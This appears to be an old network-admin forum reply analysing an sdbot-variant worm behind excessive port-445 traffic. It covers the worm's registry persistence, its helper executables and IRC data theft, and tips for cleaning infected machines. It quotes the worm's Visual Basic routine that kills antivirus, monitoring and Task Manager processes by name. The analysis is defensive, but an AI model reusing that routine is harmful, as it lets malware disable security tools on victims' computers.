Excessive Internet Traffic

// The packets are small, since I am seeing a large nuber of packets, but
// the bit count is low.
// 30 second input rate 72679000 bits/sec, 41033 packets/sec
// 30 second output rate 29208000 bits/sec, 7687 packets/sec
// Input bits per second are a little above normal, but the packet count
// would normally be under 10000 not 41000.
// Ideas?

This is likely a variant of what I forsee to become the "next big pain", a
variant of sdbot, of which McAfee claims there are 4000 variants.

I've had to deal with quite a few (and climbing) numbers of infected users
of this pain. We use a Packeteer and have listed comps sending outbound
445 garbage and I've found that almost all have been infected by one of
the versions of this particular worm. Which of the 4000 versions it is
eludes me.

This is what I've seen so far. If you look at the machine sending the
traffic out, you're likely going to see a smorgasbord of junk in
c:\WINDOWS\system32 ... If you view the folder as a list, then sort by
date, you're likely to find a huge amount of executables on the machine.
As well as logs, TFTP information etc.

You can try opening up task manager but it will be useless...

So being I'm already getting more and more familiar with this pest, here
is what it does:

Public Sub AVkiller()
On Error Resume Next
Dim AVmonz As Variant '
Dim Cur As String
Dim i
AVmonz = Array("", "AVP Monitor", _
                   "AntiVir", _
                   "Vshwin", _
                   "F-STOPW", _
                   "F-Secure", _
                   "vettray", _
                   "InoculateIT", _
                   "Norman Virus Control", _
                   "navpw32", _
                   "Norton AntiVirus", _
                   "Iomon98", _
                   "AVG", _
                   "NOD32", _
                   "Dr.Web", _
                   "Amon", _
                   "Trend PC-cillin", _
                   "File Monitor", _
                   "Registry Monitor", _
                   "Registry Editor", _
                   "Task Manager")
'Declaration of AV shitz
For i = 1 To 20
'kill'em all...
Cur = AVmonz(i)
'convert to string
Call TerminateTask(Cur)
'terminate task :wink:
Next i
End Sub


Nifty huh? The virus installs itself in the registry under odd names
associated with Microsoft for example, so far I've seen it installed in a
Run, Run Once folder called Windows Security, Windows Update, etc. There
is no removal tool for this and being it renders many virus software
useless, you can either have a user reinstall Windows, or you can search
the machine for instances of things created on the same date as the
serv32.exe program, or one of the other ones it installs.

Now... The worm seems to perhaps download 4 other programs I've always
seen running in conjuction with it. wupd.exe which masquerades as "Windows
Update" ftpd.exe which opens up an ftp server on the infected machine and
goes around re-downloaded various other viruses and worms on the infected
machine, and one which I believe tries to infect other machines perhaps
a-la Blaster worm.

Another program opens seems to randomly name viruses and worms once
downloaded so for example, wupd.exe will probably turn into something like
A032424.exe the next time around, and so on and so forth.

So far I've seen students where I am either getting this via file sharing,
one program which has been sticking out like a sore thumb is something
called ARES. It could be also spreading, again, through some of the
katrillion MS vulnerabilies and perhaps even the newly discovered "Drag
and Drop" vulnerability.

Drag and Drop vulnerabilities

So now there is also the "bling.exe" issue which is the worm that "sniffs
out passwords" (http://isc.sans.org/diary.php?date=2004-09-12), this one
opens up an irc connection to dump out data to some channel. I will
eventually (when I have some time) hexedit some of these to see what it
does and perhaps repost more information.

For a full view of what the serv32.exe does, please check out the coding
at http://www.infiltrated.net/wormcode.txt which list the original URL
(site down so it's Google cached)